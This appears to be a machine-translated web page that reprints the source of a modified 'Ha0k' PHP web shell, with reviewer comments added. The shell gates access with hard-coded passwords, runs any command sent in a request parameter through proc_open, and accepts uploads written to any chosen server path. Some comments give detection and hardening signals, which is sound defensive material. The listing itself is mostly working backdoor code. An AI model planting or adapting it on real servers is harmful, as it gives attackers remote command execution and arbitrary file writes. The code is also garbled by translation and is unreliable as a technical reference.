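This is a modified version of the Ha0k 0.3 PHP web shell (a "webpage Trojan"). For ways to defend against files of this kind, see the articles published by Script House.
The code is as follows. The listing was damaged by machine translation: spaces were inserted inside identifiers, keywords were capitalised, and some doubled characters were dropped, so it is not runnable as printed.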
// Configuration tables read by the rest of the script.
// Review note: the credentials are hard-coded in the file itself, so the
// username/password literals below are static strings a file scanner can match.
// Multiple users can be set here
$ Passwd = array ('ha0k' => 'ha0k ',
'Hackerdsb' => 'hackerdsb ');
// Alias table: when the first word of a submitted command matches a key, the
// script swaps in the mapped command before running it.
/* Set the command alias here */
$ Aliases = array ('Ls' => 'ipconfig ',
'Ll '=> 'ls-lvhF ');
// Access gate and command loop.
// The first branch challenges for HTTP Basic credentials and compares them with
// the hard-coded $passwd table; the else branch keeps per-session state (working
// directory, command history, accumulated output) and runs whatever arrives in
// the 'command' request parameter.
// NOTE(review): the listing appears to have lost doubled characters in
// translation ('|' where '||' is expected, '=' where '==' is expected, unbalanced
// ')'), so read the conditions below as a damaged copy, not the exact logic.
// Detection notes for defenders, all visible in this block: a 401 Basic challenge
// issued by a PHP file, request parameters named 'command' and 'reset', session
// keys 'cwd' / 'History' / 'output', and request data passed to proc_open().
// ereg() was removed in PHP 7.0 and get_magic_quotes_gpc() in PHP 8.0, so this
// variant depends on an older runtime.
If (! Isset ($ _ SERVER ['php _ AUTH_USER ']) |! Isset ($ _ SERVER ['php _ AUTH_PW ']) |
! Isset ($ passwd [$ _ SERVER ['php _ AUTH_USER ']) |
$ Passwd [$ _ SERVER ['php _ AUTH_USER ']! = $ _ SERVER ['php _ AUTH_PW ']) {
// Missing or wrong credentials: send the Basic-auth challenge and a 401 status.
Header ('www-Authenticate: Basic realm = "by Ha0k "');
Header ('http/1.0 401 unauthorized ');
$ Authenticated = false;
}
Else {
$ Authenticated = true;
/* Start session */
Session_start ();
/* Initialize session .*/
// State is (re)initialised on first use or when the 'reset' parameter is sent.
If (empty ($ _ SESSION ['cwd ']) |! Empty ($ _ REQUEST ['reset']) {
$ _ SESSION ['cwd '] = getcwd (); // start in the process's current working directory
$ _ SESSION ['History '] = array ();
$ _ SESSION ['output'] = '';
}
If (! Empty ($ _ REQUEST ['command']) {
If (get_magic_quotes_gpc () {// returns 0 when magic quotes are off, 1 when on (request data arrives backslash-escaped)
/* We don't want to add the commands to the history in
* Escaped form, so we remove the backslashes now .*/
$ _ REQUEST ['command'] = stripslashes ($ _ REQUEST ['command']); // stripslashes() undoes the backslash escaping
}
/* History */
If ($ I = array_search ($ _ REQUEST ['command'], $ _ SESSION ['History '])! = False) // look for the command in the saved history
Unset ($ _ SESSION ['History '] [$ I]); // drop the earlier duplicate entry
Array_unshift ($ _ SESSION ['History '], $ _ REQUEST ['command']); // array_unshift() prepends the command to the history list
/* Output Ha0k # command */
$ _ SESSION ['output']. = 'ha0k # '. $ _ REQUEST ['command']. "\ n ";
/* Initialize the current working directory .*/
// 'cd' is emulated inside the script because each request spawns a fresh
// process; the chosen directory is carried between requests in the session.
If (ereg ('^ [: blank:] * cd [[: blank:] * $', $ _ REQUEST ['command']) {
$ _ SESSION ['cwd '] = dirname (_ FILE _); // bare 'cd': go to the directory containing this script
} Elseif (ereg ('^ [: blank:] * cd [[: blank:] + ([^;] +) $ ', $ _ REQUEST ['command'], $ regs )){
/* The current command is a 'CD' command which we have to handle
* As an internal shell command .*/
If ($ regs [1] [0] = '/'){
/* Absolute path, we use it unchanged .*/
$ New_dir = $ regs [1];
} Else {
/* Relative path, we append it to the current working
* Directory .*/
$ New_dir = $ _ SESSION ['cwd '].'/'. $ regs [1];
}
// The three loops below normalise the path textually before chdir() is tried.
/* Transform '/./'into '/'*/
While (strpos ($ new_dir ,'/./')! = False)
$ New_dir = str_replace ('/./', '/', $ new_dir );
/* Transform '// 'input '/'*/
While (strpos ($ new_dir ,'//')! = False)
$ New_dir = str_replace ('//', '/', $ new_dir );
/* Transform 'X/... 'into ''*/
While (preg_match ('| /\.\.(?! \.) | ', $ New_dir ))
$ New_dir = preg_replace ('| /? [^/] + /\.\.(?! \.) | ', '', $ New_dir );
If ($ new_dir = '') $ new_dir = '/';
/* Try to change directory .*/
If (@ chdir ($ new_dir) {// change the current directory; '@' hides the warning on failure
$ _ SESSION ['cwd '] = $ new_dir;
} Else {
$ _ SESSION ['output']. = "cd: cocould not change to: $ new_dir \ n ";
}
} Else {
/* The command is not a 'CD' command, so we execute it after
* Changing the directory and save the output .*/
Chdir ($ _ SESSION ['cwd ']); // change the Directory
/* Alias extension */
$ Length = strcspn ($ _ REQUEST ['command'], "\ t"); // length of the leading part of the command before the first separator
$ Token = substr ($ _ REQUEST ['command'], 0, $ length); // first word of the command
If (isset ($ aliases [$ token])
$ _ REQUEST ['command'] = $ aliases [$ token]. substr ($ _ REQUEST ['command'], $ length );
// Review note: the request string reaches proc_open() with no validation or
// allow-list; this call is the defining behaviour of a web shell. Listing
// proc_open in php.ini's disable_functions blocks this path, and a PHP file
// that feeds request data to proc_open() is a strong static-scan signal.
$ P = proc_open ($ _ REQUEST ['command'], // run the command string as a process
Array (1 => array ('pipe', 'w '),
2 => array ('pipe', 'w ')),
$ Io );
/* Read and send */
// Descriptor 1 is the child's stdout, descriptor 2 its stderr; both are
// appended to the session output buffer.
While (! Feof ($ io [1]) {
$ _ SESSION ['output']. = htmlspecialchars (fgets ($ io [1]), // HTML-escape the output before storing it
ENT_COMPAT, 'gb2312 ');
}
/* Read */
While (! Feof ($ io [2]) {
$ _ SESSION ['output']. = htmlspecialchars (fgets ($ io [2]),
ENT_COMPAT, 'gb2312 ');
}
Fclose ($ io [1]);
Fclose ($ io [2]);
Proc_close ($ p); // close the process handle
}
}
/* Build Command History in JavaScript */
// The history is emitted as a comma-separated list of quoted strings for the
// page's script; addslashes() is the only escaping applied to each entry.
If (empty ($ _ SESSION ['History ']) {
$ Js_command_hist = '""';
} Else {
$ Escaped = array_map ('addslashes ', $ _ SESSION ['History']);
$ Js_command_hist = '"", "'. implode ('", "', $ escaped). '"'; // join the history into a quoted, comma-separated list
}
}
// Declares the response as GB2312-encoded HTML.
// NOTE(review): the echo below prints an empty-looking string; the markup it
// originally emitted was presumably stripped when the page was extracted.
Header ('content-Type: text/html; charset = GB2312 ');
Echo' '. "\ N ";
?>
// Upload handler: copies the uploaded temporary file to the path given in the
// 'remotefile' POST field. Neither the destination nor the file content is
// checked in the lines shown, so this is an arbitrary file write with the web
// server's permissions.
// NOTE(review): no authentication test is visible in this fragment; the start of
// the PHP block was lost in extraction, so confirm against a clean sample.
// $HTTP_POST_FILES is one of the long arrays removed in PHP 5.4, so this path
// depends on an older runtime. Defensive signals: a multipart POST carrying
// 'userfile' together with 'remotefile', and new files appearing in
// web-writable directories.
If (is_uploaded_file ($ HTTP_POST_FILES ['userfile'] ['tmp _ name']) {
Copy ($ HTTP_POST_FILES ['userfile'] ['tmp _ name'], $ _ POST ['remotefile']);
// Echo "file uploaded successfully:". $ HTTP_POST_FILES ['userfile'] ['name'];
}
?>
Http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>
Ha0k webshell